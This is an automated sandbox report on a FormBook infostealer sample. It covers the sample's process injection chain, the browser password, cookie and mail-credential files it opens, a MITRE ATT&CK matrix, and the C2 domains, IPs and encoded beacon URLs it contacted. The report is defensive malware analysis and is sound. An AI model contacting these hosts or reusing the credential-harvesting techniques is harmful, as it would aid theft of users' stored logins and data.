                Source: C:\Users\user\Desktop\new.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 8C5008
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C187B1 LogonUserW,5_2_00C187B1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BC3B3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BC48D7
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C24C53 mouse_event,5_2_00C24C53
                Source: C:\Users\user\Desktop\new.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C17CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C17CAF
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C1874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00C1874B
                Source: new.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: new.exe, lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE862B cpuid 5_2_00BE862B
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00BF4E87
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C01E06 GetUserNameW,5_2_00C01E06
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00BF3F3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BC49A0

                Stealing of Sensitive Information

                Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\cttune.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cttune.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: new.exe Binary or memory string: WIN_81
                Source: new.exe Binary or memory string: WIN_XP
                Source: new.exe Binary or memory string: WIN_XPe
                Source: new.exe Binary or memory string: WIN_VISTA
                Source: new.exe Binary or memory string: WIN_7
                Source: new.exe Binary or memory string: WIN_8
                Source: new.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00C36283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00C36283
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00C36747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00C36747
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00BF7AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,5_2_00BF7AA1

                Mitre Att&ck Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 2 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1574502  Sample: new.exe  Startdate: 13/12/2024  Architecture: WINDOWS  Score: 100

                Top-level network: www.tabyscooterrentals.xyz (Performs DNS queries to domains with low reputation); x103.jieruitech.info; 8 other IPs or domains
                Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures

                Process tree (recovered from the behavior graph):
                new.exe (started)
                    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                    -> svchost.exe (started)
                        signatures: Maps a DLL or memory area into another process
                        -> lxdvPfMVsD.exe (injected)
                            signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            -> cttune.exe (started)
                                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                -> lxdvPfMVsD.exe (injected)
                                    network: x103.jieruitech.info 192.197.113.112, ports 49908, 49918, 49925 (HKKFGL-AS-APHKKwaifongGroupLimitedHK, China); www.milp.store 194.9.94.86, ports 49947, 49957, 49964 (LOOPIASE, Sweden); 2 other IPs or domains
                                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                -> firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                new.exe | 45% | ReversingLabs | Win32.Trojan.AutoitInject |
                new.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.tabyscooterrentals.xyz/4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
                http://www.vavada-official.buzz | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/responsive/images/iOS-114.png | 0% | Avira URL Cloud | safe |
                http://www.vavada-official.buzz/emhd/ | 0% | Avira URL Cloud | safe |
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe |
                http://www.ftaane.net/8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe |
                http://www.milp.store/2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/responsive/images/iOS-57.png | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/responsive/styles/reset.css | 0% | Avira URL Cloud | safe |
                http://www.ftaane.net/8cvl/ | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe |
                http://www.milp.store/2j93/ | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe |
                https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Avira URL Cloud | safe |
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | 0% | Avira URL Cloud | safe |
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                94950.bodis.com | 199.59.243.227 | true | false | | high
                x103.jieruitech.info | 192.197.113.112 | true | true | | unknown
                www.milp.store | 194.9.94.86 | true | false | | unknown
                natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
                www.ftaane.net | unknown | unknown | false | | unknown
                www.vavada-official.buzz | unknown | unknown | false | | unknown
                www.tabyscooterrentals.xyz | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.tabyscooterrentals.xyz/4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== | false | Avira URL Cloud: safe | unknown
                http://www.ftaane.net/8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP | true | Avira URL Cloud: safe | unknown
                http://www.milp.store/2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== | false | Avira URL Cloud: safe | unknown
                http://www.vavada-official.buzz/emhd/ | false | Avira URL Cloud: safe | unknown
                http://www.ftaane.net/8cvl/ | true | Avira URL Cloud: safe | unknown
                http://www.milp.store/2j93/ | false | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://duckduckgo.com/chrome_newtab | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://static.loopia.se/responsive/images/iOS-114.png | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.vavada-official.buzz | lxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://static.loopia.se/responsive/images/iOS-72.png | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.ecosia.org/newtab/ | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://static.loopia.se/responsive/styles/reset.css | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://ac.ecosia.org/autocomplete?q= | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://static.loopia.se/responsive/images/iOS-57.png | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://static.loopia.se/shared/logo/logo-loopia-white.svg | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp | false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkincttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://static.loopia.se/shared/images/additional-pages-hero-shape.webpcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://static.loopia.se/shared/style/2022-extra-pages.csscttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
194.9.94.86 | www.milp.store | Sweden | 39570 | LOOPIASE | false
192.197.113.112 | x103.jieruitech.info | China | 133115 | HKKFGL-AS-APHKKwaifongGroupLimitedHK | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1574502
